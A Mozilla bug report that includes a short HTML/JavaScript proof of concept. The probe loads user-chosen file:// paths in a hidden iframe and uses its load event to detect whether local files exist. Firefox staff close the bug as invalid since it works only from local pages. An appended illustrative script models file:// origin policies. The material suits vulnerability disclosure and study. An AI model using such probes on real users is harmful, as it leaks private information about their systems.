Closed
Bug 1347541
Opened 7 years ago
Closed 7 years ago
Detection of arbitrary local files
Categories
(Core :: DOM: Core & HTML, defect)
RESOLVED
INVALID
People
(Reporter: junorouse, Unassigned)
Attachments
(1 file)
619 bytes,
text/html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

I sent you an email. But I can't receive an email.
I can detect a local file. But only file:// protocol can. But Chrome and many other browsers blocked this way.
I am on macOS Sierra 10.12.3.

POC
------------------------------------
<iframe src="file:///private/etc/" style="display:none" id="d"></iframe>
<div id="x"> </div>
<script>
function go(e) {
    document.getElementById('check').innerHTML = "no";
    var d = document.getElementById('d');
    var x = document.getElementById('x');
    var c = d.cloneNode();
    function file_onLoad() {
        document.getElementById('check').innerHTML = "exist";
    }
    c.addEventListener('load', file_onLoad, false);
    c.src = "file://" + document.getElementById('ww').value;
    x.appendChild(c);
}
</script>
<input type='text' value="/private/etc" id='ww' />
<input type='button' value="check" onclick='go(this)'/>
<div id="check"> </div>

Actual results:

Detect all local files existing.
https://youtu.be/RWp4sEQE-H4

Expected results:

Can detect all local files.
Updated•7 years ago
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Comment 2•7 years ago
This does not work when loaded from the web, only if loaded as a local file. There's currently no standard for how local files are treated, everything from "all file:// are same origin" to "each file:// is a separate origin". Chrome does the latter, we're somewhere in the middle.
Group: dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → INVALID
Updated•5 years ago
Component: DOM → DOM: Core & HTML
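Added example, not part of the bug thread and not Firefox or Chrome code: a small JavaScript model of the file:// origin policies comment 2 lists, showing which local targets a local page would be same-origin with under each. The SAME_DIR rule used for the "middle" case, the function names and the sample paths are assumptions made for illustration.

```javascript
// Added illustration; not Firefox or Chrome source code.
const POLICIES = {
  ALL_SAME: 'all file:// are same origin',
  PER_FILE: 'each file:// is a separate origin',
  // Assumption: one possible "middle" rule, same directory or below.
  SAME_DIR: 'same directory or below',
};

// Directory part of a path, trailing "/" kept so "/a/b" never matches "/a/bc".
function dirOf(path) {
  return path.slice(0, path.lastIndexOf('/') + 1);
}

// May a document at pageUrl script a document at targetUrl under `policy`?
function sameOrigin(policy, pageUrl, targetUrl) {
  // new URL() resolves "." and ".." segments, so a target written as
  // ".../Downloads/../../../private/etc/" is compared by its real location.
  const page = new URL(pageUrl);
  const target = new URL(targetUrl);
  if (page.protocol !== 'file:' || target.protocol !== 'file:') {
    // Web content: ordinary scheme/host/port comparison; file: never matches.
    return page.origin !== 'null' && page.origin === target.origin;
  }
  switch (policy) {
    case POLICIES.ALL_SAME: return true;
    case POLICIES.PER_FILE: return page.pathname === target.pathname;
    case POLICIES.SAME_DIR: return target.pathname.startsWith(dirOf(page.pathname));
    default: throw new RangeError('unknown policy: ' + policy);
  }
}

// Decision under each policy, keyed by policy name.
function decisionTable(pageUrl, targetUrl) {
  const out = {};
  for (const [name, policy] of Object.entries(POLICIES)) {
    out[name] = sameOrigin(policy, pageUrl, targetUrl);
  }
  return out;
}

// Constructed sample URLs; only /private/etc/ comes from the report.
const LOCAL_PAGE = 'file:///Users/alice/Downloads/poc.html';
const SAMPLES = [
  'file:///private/etc/',
  'file:///Users/alice/Downloads/notes/a.html',
  'file:///Users/alice/Downloads/../../../private/etc/',
];
for (const t of SAMPLES) console.log(t, decisionTable(LOCAL_PAGE, t));
console.log('from the web', decisionTable('https://example.com/poc.html', SAMPLES[0]));
```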